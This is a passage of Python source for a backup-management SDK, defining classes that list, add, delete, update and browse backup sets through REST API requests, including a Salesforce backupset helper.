_do_browse() -- performs a browse operation with the given options
update_properties() -- updates the backupset properties
set_default_backupset() -- sets the backupset as the default backup set for the agent,
if not already default
backup() -- runs full backup for all subclients
associated with this backupset
browse() -- browse the content of the backupset
find() -- find content in the backupset
refresh() -- refresh the properties of the backupset
    delete_data() -- deletes items from the backupset and makes them unavailable
to browse and restore
Backupset instance Attributes
-----------------------------
**properties** -- returns the properties of backupset
**name** -- returns the name of the backupset
**guid** -- treats the backupset GUID as a property
of the Backupset class
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import threading
import time
import copy
from base64 import b64encode
from past.builtins import basestring
from .subclient import Subclients
from .schedules import Schedules
from .exception import SDKException
class Backupsets(object):
"""Class for getting all the backupsets associated with a client."""
def __init__(self, class_object):
"""Initialize object of the Backupsets class.
Args:
class_object (object) -- instance of the Agent / Instance class
Returns:
object - instance of the Backupsets class
Raises:
SDKException:
if class object is not an instance of the Agent / Instance class
"""
from .agent import Agent
from .instance import Instance
self._instance_object = None
if isinstance(class_object, Agent):
self._agent_object = class_object
elif isinstance(class_object, Instance):
self._instance_object = class_object
self._agent_object = class_object._agent_object
else:
raise SDKException('Backupset', '103')
self._client_object = self._agent_object._client_object
self._commcell_object = self._agent_object._commcell_object
self._cvpysdk_object = self._commcell_object._cvpysdk_object
self._services = self._commcell_object._services
self._update_response_ = self._commcell_object._update_response_
self._BACKUPSETS = self._services['GET_ALL_BACKUPSETS'] % (self._client_object.client_id)
from .backupsets.fsbackupset import FSBackupset
from .backupsets.nasbackupset import NASBackupset
from .backupsets.hanabackupset import HANABackupset
from .backupsets.cabackupset import CloudAppsBackupset
from .backupsets.postgresbackupset import PostgresBackupset
from .backupsets.adbackupset import ADBackupset
from .backupsets.db2backupset import DB2Backupset
from .backupsets.vsbackupset import VSBackupset
from .backupsets.aadbackupset import AzureAdBackupset
from .backupsets.sharepointbackupset import SharepointBackupset
self._backupsets_dict = {
'file system': FSBackupset,
'nas': NASBackupset, # SP11 or lower CS honors NAS as the Agent Name
'ndmp': NASBackupset, # SP12 and above honors NDMP as the Agent Name
'sap hana': HANABackupset,
'cloud apps': CloudAppsBackupset,
'postgresql': PostgresBackupset,
"active directory" : ADBackupset,
'db2': DB2Backupset,
'virtual server': VSBackupset,
"azure ad" : AzureAdBackupset,
'sharepoint server': SharepointBackupset
}
if self._agent_object.agent_name in ['cloud apps', 'sql server', 'sap hana']:
self._BACKUPSETS += '&excludeHidden=0'
self._backupsets = None
self._default_backup_set = None
self.refresh()
def __str__(self):
"""Representation string consisting of all backupsets of the agent of a client.
Returns:
str - string of all the backupsets of an agent of a client
"""
representation_string = '{:^5}\t{:^20}\t{:^20}\t{:^20}\t{:^20}\n\n'.format(
'S. No.', 'Backupset', 'Instance', 'Agent', 'Client'
)
for index, backupset in enumerate(self._backupsets):
sub_str = '{:^5}\t{:20}\t{:20}\t{:20}\t{:20}\n'.format(
index + 1,
backupset.split('\\')[-1],
self._backupsets[backupset]['instance'],
self._agent_object.agent_name,
self._client_object.client_name
)
representation_string += sub_str
return representation_string.strip()
def __repr__(self):
"""Representation string for the instance of the Backupsets class."""
return "Backupsets class instance for Agent: '{0}'".format(self._agent_object.agent_name)
def __len__(self):
"""Returns the number of the backupsets for the selected Agent."""
return len(self.all_backupsets)
def __getitem__(self, value):
"""Returns the name of the backupset for the given backupset ID or
the details of the backupset for given backupset Name.
Args:
value (str / int) -- Name or ID of the backupset
Returns:
str - name of the backupset, if the backupset id was given
dict - dict of details of the backupset, if backupset name was given
Raises:
IndexError:
no backupset exists with the given Name / Id
"""
value = str(value)
if value in self.all_backupsets:
return self.all_backupsets[value]
else:
try:
return list(
filter(lambda x: x[1]['id'] == value, self.all_backupsets.items())
)[0][0]
except IndexError:
raise IndexError('No backupset exists with the given Name / Id')
def _get_backupsets(self):
"""Gets all the backupsets associated to the agent specified by agent_object.
Returns:
dict - consists of all backupsets of the agent
{
"backupset1_name": {
"id": backupset1_id,
"instance": instance
},
"backupset2_name": {
"id": backupset2_id,
"instance": instance
}
}
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('GET', self._BACKUPSETS)
if flag:
if response.json() and 'backupsetProperties' in response.json():
return_dict = {}
for dictionary in response.json()['backupsetProperties']:
agent = dictionary['backupSetEntity']['appName'].lower()
instance = dictionary['backupSetEntity']['instanceName'].lower()
if self._instance_object is not None:
if (self._instance_object.instance_name in instance and
self._agent_object.agent_name in agent):
temp_name = dictionary['backupSetEntity']['backupsetName'].lower()
temp_id = str(dictionary['backupSetEntity']['backupsetId']).lower()
return_dict[temp_name] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = temp_name
elif self._agent_object.agent_name in agent:
temp_name = dictionary['backupSetEntity']['backupsetName'].lower()
temp_id = str(dictionary['backupSetEntity']['backupsetId']).lower()
if len(self._agent_object.instances.all_instances) > 1:
return_dict["{0}\\{1}".format(instance, temp_name)] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = "{0}\\{1}".format(instance, temp_name)
else:
return_dict[temp_name] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = temp_name
return return_dict
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
@property
def all_backupsets(self):
"""Returns the dict of backupsets for the Agent / Instance of the selected Client
dict - consists of all backupsets
{
"backupset1_name": {
"id": backupset1_id,
"instance": instance
},
"backupset2_name": {
"id": backupset2_id,
"instance": instance
}
}
"""
return self._backupsets
def has_backupset(self, backupset_name):
"""Checks if a backupset exists for the agent with the input backupset name.
Args:
backupset_name (str) -- name of the backupset
Returns:
bool - boolean output whether the backupset exists for the agent or not
Raises:
SDKException:
if type of the backupset name argument is not string
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
return self._backupsets and backupset_name.lower() in self._backupsets
def _process_add_response(self, backupset_name, request_json):
"""Runs the Backupset Add API with the request JSON provided,
and returns the contents after parsing the response.
Args:
backupset_name (str) -- backupset name
request_json (dict) -- JSON request to run for the API
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('POST', self._services['ADD_BACKUPSET'], request_json)
if flag:
if response.json():
if 'response' in response.json():
error_code = response.json()['response'][0]['errorCode']
if error_code != 0:
error_string = response.json()['response'][0]['errorString']
o_str = 'Failed to create backupset\nError: "{0}"'.format(error_string)
raise SDKException('Backupset', '102', o_str)
else:
# initialize the backupsets again
# so the backupset object has all the backupsets
self.refresh()
return self.get(backupset_name)
elif 'errorMessage' in response.json():
error_string = response.json()['errorMessage']
                    o_str = 'Failed to create backupset\nError: "{0}"'.format(error_string)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def add(self, backupset_name, on_demand_backupset=False, **kwargs):
"""Adds a new backup set to the agent.
Args:
backupset_name (str) -- name of the new backupset to add
on_demand_backupset (bool) -- flag to specify whether the backupset to be added
is a simple backupset or an on-demand backupset
default: False
**kwargs -- dict of keyword arguments as follows:
storage_policy (str) -- name of the storage policy to associate to the
backupset
plan_name (str) -- name of the plan to associate to the backupset
Returns:
object - instance of the Backupset class, if created successfully
Raises:
SDKException:
if type of the backupset name argument is not string
if failed to create a backupset
if response is empty
if response is not success
if backupset with same name already exists
"""
if not (isinstance(backupset_name, basestring) and isinstance(on_demand_backupset, bool)):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
raise SDKException(
'Backupset', '102', 'Backupset "{0}" already exists.'.format(backupset_name)
)
if self._instance_object is None:
if self._agent_object.instances.has_instance('DefaultInstanceName'):
self._instance_object = self._agent_object.instances.get('DefaultInstanceName')
else:
self._instance_object = self._agent_object.instances.get(
sorted(self._agent_object.instances.all_instances)[0]
)
request_json = {
"association": {
"entity": [{
"clientName": self._client_object.client_name,
"appName": self._agent_object.agent_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": backupset_name
}]
},
"backupSetInfo": {
"commonBackupSet": {
"onDemandBackupset": on_demand_backupset
}
}
}
# apply agent-specific settings directly; exec'ing a code string stored in a
# dict fails here with an IndentationError and is harder to follow
if self._agent_object.agent_name == 'db2':
request_json['backupSetInfo'].update({
'db2BackupSet': {
'dB2DefaultIndexSP': {
'storagePolicyName': kwargs.get('storage_policy', '')
}
}
})
if kwargs.get('plan_name'):
plan_entity_dict = {
"planName": kwargs.get('plan_name')
}
request_json['backupSetInfo']['planEntity'] = plan_entity_dict
flag, response = self._cvpysdk_object.make_request(
'POST', self._services['ADD_BACKUPSET'], request_json
)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to create new backupset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
return self.get(backupset_name)
else:
o_str = ('Failed to create new backupset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to create new backupset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
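# Usage sketch (hedged): a minimal example of adding a backupset through this
# collection. ``agent`` and the names used below are illustrative assumptions,
# not part of this module.
#
#   backupsets = agent.backupsets
#   if not backupsets.has_backupset('weekly_set'):
#       new_backupset = backupsets.add('weekly_set', plan_name='server_plan')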
def add_archiveset(self, archiveset_name):
"""
Adds a new archiveset to the agent. It is just a backupset, but is mainly used for archive-only items
Args:
archiveset_name (str) -- name of new archiveset to add
Returns:
object - instance of the Backupset class, if created successfully
Raises:
SDKException:
if type of the archiveset name argument is not string
if failed to create an archiveset
if response is empty
if response is not success
if archiveset with same name already exists
"""
if not (isinstance(archiveset_name, basestring)):
raise SDKException('Backupset', '101')
else:
archiveset_name = archiveset_name.lower()
if self.has_backupset(archiveset_name):
raise SDKException('Backupset', '102', 'Archiveset "{0}" already exists.'.format(archiveset_name))
request_json = {
"backupSetInfo": {
"useContentFromPlan": False,
"planEntity": {},
"commonBackupSet": {
"isArchivingEnabled": True,
"isDefaultBackupSet": False
},
"backupSetEntity": {
"_type_": 6,
"clientId": int(self._client_object.client_id),
"backupsetName": archiveset_name,
"applicationId": int(self._agent_object.agent_id)
},
"subClientList": [
{
"contentOperationType": 1,
"fsSubClientProp": {
"useGlobalFilters": 2,
"forcedArchiving": True,
"diskCleanupRules": {
"enableArchivingWithRules": True,
"diskCleanupFileTypes": {}
}
},
"content": [
{
"path": ""
}
]
}
]
}
}
flag, response = self._cvpysdk_object.make_request(
'POST', self._services['ADD_BACKUPSET'], request_json
)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to create new Archiveset\nError: "{0}"'.format(
error_message
)
raise SDKException('Archiveset', '102', o_str)
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
return self.get(archiveset_name)
else:
o_str = ('Failed to create new Archiveset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to create new Archiveset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def add_salesforce_backupset(
self,
salesforce_options,
db_options=None, **kwargs):
"""Adds a new Salesforce Backupset to the Commcell.
Args:
salesforce_options (dict) -- salesforce options
{
"salesforce_user_name": 'salesforce login user',
"salesforce_user_password": 'salesforce user password',
"salesforce_user_token": 'salesforce user token'
}
db_options (dict) -- database options to configure sync db
{
"db_enabled": 'True or False',
"db_type": 'SQLSERVER or POSTGRESQL',
"db_host_name": 'database hostname',
"db_instance": 'database instance name',
"db_name": 'database name',
"db_port": 'port of the database',
"db_user_name": 'database user name',
"db_user_password": 'database user password'
}
**kwargs (dict) -- dict of keyword arguments as follows
download_cache_path (str) -- download cache path
mutual_auth_path (str) -- mutual auth cert path
storage_policy (str) -- storage policy
streams (int) -- number of streams
Returns:
object - instance of the Backupset class for this new backupset
Raises:
SDKException:
if backupset with given name already exists
if failed to add the backupset
if response is empty
if response is not success
"""
if db_options is None:
db_options = {'db_enabled': False}
if self.has_backupset(salesforce_options.get('salesforce_user_name')):
raise SDKException('Backupset', '102',
'Backupset "{0}" already exists.'.format(salesforce_options.get('salesforce_user_name')))
salesforce_password = b64encode(salesforce_options.get('salesforce_user_password').encode()).decode()
salesforce_token = b64encode(salesforce_options.get('salesforce_user_token', '').encode()).decode()
db_user_password = ""
if db_options.get('db_enabled', False):
db_user_password = b64encode(db_options.get('db_user_password').encode()).decode()
request_json = {
"backupSetInfo": {
"backupSetEntity": {
"clientName": self._client_object.client_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": salesforce_options.get('salesforce_user_name'),
"appName": self._agent_object.agent_name
},
"cloudAppsBackupset": {
"instanceType": 3,
"salesforceBackupSet": {
"enableREST": True,
"downloadCachePath": kwargs.get('download_cache_path', '/tmp'),
"mutualAuthPath": kwargs.get('mutual_auth_path', ''),
"token": salesforce_token,
"userPassword": {
"userName": salesforce_options.get('salesforce_user_name'),
"password": salesforce_password,
},
"syncDatabase": {
"dbEnabled": db_options.get('db_enabled', False),
"dbPort": db_options.get('db_port', '1433'),
"dbInstance": db_options.get('db_instance', ''),
"dbName": db_options.get('db_name', self._instance_object.instance_name),
"dbType": db_options.get('db_type', "SQLSERVER"),
"dbHost": db_options.get('db_host_name', ''),
"dbUserPassword": {
"userName": db_options.get('db_user_name', ''),
"password": db_user_password,
},
},
},
"generalCloudProperties": {
"numberOfBackupStreams": kwargs.get('streams', 2),
"storageDevice": {
"dataBackupStoragePolicy": {
"storagePolicyName": kwargs.get('storage_policy', '')
},
},
},
},
},
}
return self._process_add_response(salesforce_options.get('salesforce_user_name'), request_json)
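# Usage sketch (hedged): all values below are placeholders; db_options may be
# omitted entirely, in which case the sync database is left disabled.
#
#   backupset = backupsets.add_salesforce_backupset(
#       salesforce_options={
#           'salesforce_user_name': 'user@example.com',
#           'salesforce_user_password': '********',
#           'salesforce_user_token': 'token'
#       },
#       storage_policy='sp_cloud_apps',
#       streams=2
#   )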
def get(self, backupset_name):
"""Returns a backupset object of the specified backupset name.
Args:
backupset_name (str) -- name of the backupset
Returns:
object - instance of the Backupset class for the given backupset name
Raises:
SDKException:
if type of the backupset name argument is not string
if no backupset exists with the given name
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
if self._instance_object is None:
self._instance_object = self._agent_object.instances.get(
self._backupsets[backupset_name]['instance']
)
if self._agent_object.agent_name in self._backupsets_dict.keys():
return self._backupsets_dict[self._agent_object.agent_name](
self._instance_object,
backupset_name,
self._backupsets[backupset_name]["id"]
)
else:
return Backupset(
self._instance_object,
backupset_name,
self._backupsets[backupset_name]["id"]
)
raise SDKException(
'Backupset', '102', 'No backupset exists with name: "{0}"'.format(backupset_name)
)
def delete(self, backupset_name):
"""Deletes the backup set from the agent.
Args:
backupset_name (str) -- name of the backupset
Raises:
SDKException:
if type of the backupset name argument is not string
if failed to delete the backupset
if response is empty
if response is not success
if no backupset exists with the given name
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
delete_backupset_service = self._services['BACKUPSET'] % (
self._backupsets[backupset_name]['id']
)
flag, response = self._cvpysdk_object.make_request('DELETE', delete_backupset_service)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to delete backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(error_message))
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
else:
o_str = ('Failed to delete backupset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to delete backupset\nError: "{0}"'.format(error_message)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
else:
raise SDKException(
'Backupset', '102', 'No backupset exists with name: "{0}"'.format(backupset_name)
)
def refresh(self):
"""Refresh the backupsets associated with the Agent / Instance."""
self._backupsets = self._get_backupsets()
@property
def default_backup_set(self):
"""Returns the name of the default backup set for the selected Client and Agent."""
return self._default_backup_set
class Backupset(object):
"""Class for performing backupset operations for a specific backupset."""
def __init__(self, instance_object, backupset_name, backupset_id=None):
"""Initialise the backupset object.
Args:
instance_object (object) -- instance of the Instance class
backupset_name (str) -- name of the backupset
backupset_id (str) -- id of the backupset
default: None
Returns:
object - instance of the Backupset class
"""
self._instance_object = instance_object
self._agent_object = self._instance_object._agent_object
self._client_object = self._agent_object._client_object
self._commcell_object = self._agent_object._commcell_object
self._cvpysdk_object = self._commcell_object._cvpysdk_object
self._services = self._commcell_object._services
self._update_response_ = self._commcell_object._update_response_
# self._restore_methods = ['_process_restore_response', '_filter_paths', '_restore_json']
self._restore_methods = [
'_process_restore_response',
'_filter_paths',
'_restore_json',
'_impersonation_json',
'_restore_browse_option_json',
'_restore_common_options_json',
'_restore_destination_json',
'_restore_fileoption_json',
'_json_restore_subtask'
]
self._restore_options_json = [
'_impersonation_json_',
'_browse_restore_json',
'_destination_restore_json',
'_commonoption_restore_json',
'_fileoption_restore_json',
]
self._backupset_name = backupset_name.split('\\')[-1].lower()
self._description = None
if backupset_id:
# Use the backupset id provided in the arguments
self._backupset_id = str(backupset_id)
else:
# Get the id associated with this backupset
self._backupset_id = self._get_backupset_id()
self._BACKUPSET = self._services['BACKUPSET'] % (self.backupset_id)
self._BROWSE = self._services['BROWSE']
self._RESTORE = self._services['RESTORE']
self._is_default = False
self._is_on_demand_backupset = False
self._properties = None
self._backupset_association = {}
self._plan = None
self.subclients = None
self.schedules = None
self.refresh()
self._default_browse_options = {
'operation': 'browse',
'show_deleted': False,
'from_time': 0, # value should either be the Epoch time or the Timestamp
'to_time': 0, # value should either be the Epoch time or the Timestamp
'path': '\\',
'copy_precedence': 0,
'media_agent': '',
'page_size': 100000,
'skip_node': 0,
'restore_index': True,
'vm_disk_browse': False,
'filters': [],
'job_id': 0,
'commcell_id': self._commcell_object.commcell_id,
'include_aged_data': False,
'include_hidden': False,
'include_running_jobs': False,
'vs_volume_browse': False,
'browse_view_name': 'VOLUMEVIEW',
'_subclient_id': 0,
'_raw_response': False
}
def __getattr__(self, attribute):
"""Returns the persistent attributes"""
if attribute in self._restore_methods:
return getattr(self._instance_object, attribute)
elif attribute in self._restore_options_json:
return getattr(self._instance_object, attribute)
return super(Backupset, self).__getattribute__(attribute)
def __repr__(self):
"""String representation of the instance of this class."""
representation_string = ('Backupset class instance for Backupset: "{0}" '
'for Instance: "{1}" of Agent: "{2}"')
return representation_string.format(
self.backupset_name,
self._instance_object.instance_name,
self._agent_object.agent_name
)
def _get_backupset_id(self):
"""Gets the backupset id associated with this backupset.
Returns:
str - id associated with this backupset
"""
backupsets = Backupsets(self._instance_object)
return backupsets.get(self.backupset_name).backupset_id
def _get_backupset_properties(self):
"""Gets the properties of this backupset.
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('GET', self._BACKUPSET)
if flag:
if response.json() and "backupsetProperties" in response.json():
self._properties = response.json()["backupsetProperties"][0]
backupset_name = self._properties["backupSetEntity"]["backupsetName"]
self._backupset_name = backupset_name.lower()
self._backupset_association = self._properties['backupSetEntity']
self._is_default = bool(self._properties["commonBackupSet"]["isDefaultBackupSet"])
if 'commonBackupSet' in self._properties:
if 'onDemandBackupset' in self._properties['commonBackupSet']:
self._is_on_demand_backupset = bool(
self._properties['commonBackupSet']['onDemandBackupset']
)
if "userDescription" in self._properties["commonBackupSet"]:
self._description = self._properties["commonBackupSet"]["userDescription"]
if "planName" in self._properties["planEntity"]:
self._plan = self._commcell_object.plans.get(
self._properties["planEntity"]["planName"]
)
else:
self._plan = None
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _run_backup(self, subclient_name, return_list):
"""Triggers incremental backup job for the given subclient,
and appends its Job object to the list.
The SDKException class instance is appended to the list,
if any exception is raised while running the backup job for the Subclient.
Args:
subclient_name (str) -- name of the subclient to trigger the backup for
return_list (list) -- list to append the job object to
"""
try:
job = self.subclients.get(subclient_name).backup()
if job:
return_list.append(job)
except SDKException as excp:
return_list.append(excp)
def _process_update_reponse(self, request_json):
"""Runs the Backupset update API with the request JSON provided,
and returns the contents after parsing the response.
Args:
request_json (dict) -- JSON request to run for the API
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('POST', self._BACKUPSET, request_json)
self._get_backupset_properties()
if flag:
if response.json() and "response" in response.json():
error_code = str(response.json()["response"][0]["errorCode"])
if error_code == "0":
return True, "0", ""
else:
error_string = ""
if "errorString" in response.json()["response"][0]:
error_string = response.json()["response"][0]["errorString"]
if error_string:
return False, error_code, error_string
else:
return False, error_code, ""
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _update(self, backupset_name, backupset_description, default_backupset):
"""Updates the properties of the backupset.
Args:
backupset_name (str) -- new name of the backupset
backupset_description (str) -- description of the backupset
default_backupset (bool) -- default backupset property
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
request_json = {
"association": {
"entity": [{
"clientName": self._client_object.client_name,
"appName": self._agent_object.agent_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": self.backupset_name
}]
},
"backupsetProperties": {
"commonBackupSet": {
"newBackupSetName": backupset_name,
"isDefaultBackupSet": default_backupset
}
}
}
if backupset_description is not None:
request_json["backupsetProperties"]["commonBackupSet"][
"userDescription"] = backupset_description
return self._process_update_reponse(request_json)
@staticmethod
def _get_epoch_time(timestamp):
"""Returns the Epoch time given the input time is in format %Y-%m-%d %H:%M:%S.
Args:
timestamp (int / str) -- value should either be the Epoch time or, the
Timestamp of the format %Y-%m-%d %H:%M:%S
Returns:
int - epoch time converted from the input timestamp
Raises:
SDKException:
if the input timestamp is not of correct format
"""
if str(timestamp) == '0':
return 0
try:
# return the timestamp value in int type
return int(timestamp)
except ValueError:
# if not convertible to int, then convert the timestamp input to Epoch time
try:
return int(time.mktime(time.strptime(timestamp, "%Y-%m-%d %H:%M:%S")))
except Exception:
raise SDKException('Subclient', '106')
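# Illustrative behaviour of _get_epoch_time (hedged): an integer or numeric
# string is returned unchanged as an int, while a formatted timestamp is
# converted using the machine's local timezone, so the exact value is host dependent.
#
#   Backupset._get_epoch_time(0)                      -> 0
#   Backupset._get_epoch_time('1617235200')           -> 1617235200
#   Backupset._get_epoch_time('2021-04-01 00:00:00')  -> epoch seconds (timezone dependent)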
def _set_defaults(self, final_dict, defaults_dict):
"""Iterates over the defaults_dict, and adds the default value to the final_dict,
for the key which is not present in the final dict.
Recursively sets default values on the final_dict dictionary.
Args:
final_dict (dict) -- the dictionary to be set with defaults, and to be used
to generate the Browse / Find JSON
defaults_dict (dict) -- the dictionary with default values
Returns:
None
"""
for key in defaults_dict:
if key not in final_dict:
final_dict[key] = defaults_dict[key]
if isinstance(defaults_dict[key], dict):
self._set_defaults(final_dict[key], defaults_dict[key])
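# Worked example (hedged, with illustrative keys rather than the real browse options):
#
#   final    = {'path': 'c:\\data', 'paging': {'page_size': 500}}
#   defaults = {'path': '\\', 'show_deleted': False,
#               'paging': {'page_size': 100000, 'skip_node': 0}}
#   self._set_defaults(final, defaults)
#   # final is now {'path': 'c:\\data', 'show_deleted': False,
#   #               'paging': {'page_size': 500, 'skip_node': 0}}
#
# Keys already present in the caller's dict are preserved; missing keys, at any
# nesting level, are filled in from the defaults.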
def _prepare_browse_options(self, options):
"""Prepares the options for the Browse/find operation.
Args:
options (dict) -- a dictionary of browse options
Returns:
dict - The browse options with all the default options set
"""
self._set_defaults(options, self._default_browse_options)
return options
def _prepare_browse_json(self, options):
"""Prepares the JSON object for the browse request.
Args:
options (dict) -- the browse options dictionary
Returns:
dict - The JSON request object for the browse operation
"""
operation_types = {
'browse': 0,
'find': 1,
'all_versions': 2,
'delete_data': 7
}
options['operation'] = options['operation'].lower()
if options['operation'] not in operation_types:
options['operation'] = 'find'
# add the browse mode value here, if it is different for an agent
# if agent is not added in the dict, default value 2 will be used
browse_mode = {
'virtual server': 4,
'cloud apps': 3,
'azure ad' : 3
}
mode = 2
paths = []
if isinstance(options['path'], basestring):
paths.append(options['path'])
elif isinstance(options['path'], list):
paths = options['path']
else:
paths = ['\\']
if self._agent_object.agent_name in browse_mode:
mode = browse_mode[self._agent_object.agent_name]
request_json = {
"opType": operation_types[options['operation']],
"mode": {
"mode": mode
},
"paths": [{"path": path} for path in paths],
"options": {
"showDeletedFiles": options['show_deleted'],
"restoreIndex": options['restore_index'],
"vsDiskBrowse": options['vm_disk_browse'],
"vsFileBrowse": options.get('vs_file_browse', False)
},
"entity": {
"clientName": self._client_object.client_name,
"clientId": int(self._client_object.client_id),
"applicationId": int(self._agent_object.agent_id),
"instanceId": int(self._instance_object.instance_id),
"backupsetId": int(self.backupset_id),
"subclientId": int(options['_subclient_id'])
},
"timeRange": {
"fromTime": self._get_epoch_time(options['from_time']),
"toTime": self._get_epoch_time(options['to_time'])
},
"advOptions": {
"copyPrecedence": options['copy_precedence']
},
"ma": {
"clientName": options['media_agent']
},
"queries": [{
"type": 0,
"queryId": "dataQuery",
"dataParam": {
"sortParam": {
"ascending": False,
"sortBy": [0]
},
"paging": {
"pageSize": int(options['page_size']),
"skipNode": int(options['skip_node']),
"firstNode": 0
}
}
}]
}
if options['filters']:
# [('FileName', '*.txt'), ('FileSize','GT','100')]
request_json['queries'][0]['whereClause'] = []
for browse_filter in options['filters']:
if browse_filter[0] in ('FileName', 'FileSize'):
temp_dict = {
'connector': 0,
'criteria': {
'field': browse_filter[0],
'values': [browse_filter[1]]
}
}
if browse_filter[0] == 'FileSize':
temp_dict['criteria']['dataOperator'] = browse_filter[2]
request_json['queries'][0]['whereClause'].append(temp_dict)
if options['job_id'] != 0:
request_json['advOptions']['advConfig'] = {
'browseAdvancedConfigBrowseByJob': {
'commcellId': options['commcell_id'],
'jobId': options['job_id']
}
}
if options['include_aged_data']:
request_json['options']['includeAgedData'] = True
if options['include_hidden']:
request_json['options']['includeHidden'] = True
if options['include_running_jobs']:
request_json['options']['includeRunningJobs'] = True
if options['vs_volume_browse']:
request_json['mode']['mode'] = 3
request_json['options']['vsVolumeBrowse'] = True
request_json['advOptions']['browseViewName'] = options['browse_view_name']
return request_json
def _process_browse_all_versions_response(self, result_set):
"""Retrieves the items from browse response.
Args:
result_set (list of dict) -- browse response dict obtained from server
Returns:
dict - Dictionary of the specified file with list of all the file versions and
additional metadata retrieved from browse
Raises:
SDKException:
if failed to browse/search for content
if response is empty
if response is not success
"""
path = None
versions_list = []
for result in result_set:
name = result['displayName']
path = result['path']
if 'modificationTime' in result:
mod_time = time.localtime(int(result['modificationTime']))
mod_time = time.strftime('%d/%m/%Y %H:%M:%S', mod_time)
else:
mod_time = None
if 'file' in result['flags']:
if result['flags']['file'] in (True, '1'):
file_or_folder = 'File'
else:
file_or_folder = 'Folder'
else:
file_or_folder = 'Folder'
if 'size' in result:
size = result['size']
else:
size = None
if 'version' in result:
version = result['version']
else:
version = None
paths_dict = {
'name': name,
'version': version,
'size': size,
'modified_time': mod_time,
'type': file_or_folder,
'advanced_data': result['advancedData']
}
versions_list.append(paths_dict)
all_versions_dict = dict()
all_versions_dict[path] = versions_list
return all_versions_dict
def _process_browse_response(self, flag, response, options):
"""Retrieves the items from browse response.
Args:
flag (bool) -- boolean, whether the response was success or not
response (dict) -- JSON response received for the request from the Server
options (dict) -- The browse options dictionary
Returns:
list - List of only the file / folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved from browse
Raises:
SDKException:
if failed to browse/search for content
if response is empty
if response is not success
"""
operation_types = {
"browse": ('110', 'Failed to browse for subclient backup content\nError: "{0}"'),
"find": ('111', 'Failed to Search\nError: "{0}"'),
"all_versions": (
'112', 'Failed to browse all version for specified content\nError: "{0}"'
),
"delete_data": (
'113', 'Failed to perform delete data operation for given content\nError: "{0}"'
)
}
exception_code = operation_types[options['operation']][0]
exception_message = operation_types[options['operation']][1]
if flag:
response_json = response.json()
paths_dict = {}
paths = []
result_set = None
browse_result = None
# Send raw result as browse response for advanced use cases
if options['_raw_response']:
return [], response_json
if response_json and 'browseResponses' in response_json:
_browse_responses = response_json['browseResponses']
for browse_response in _browse_responses:
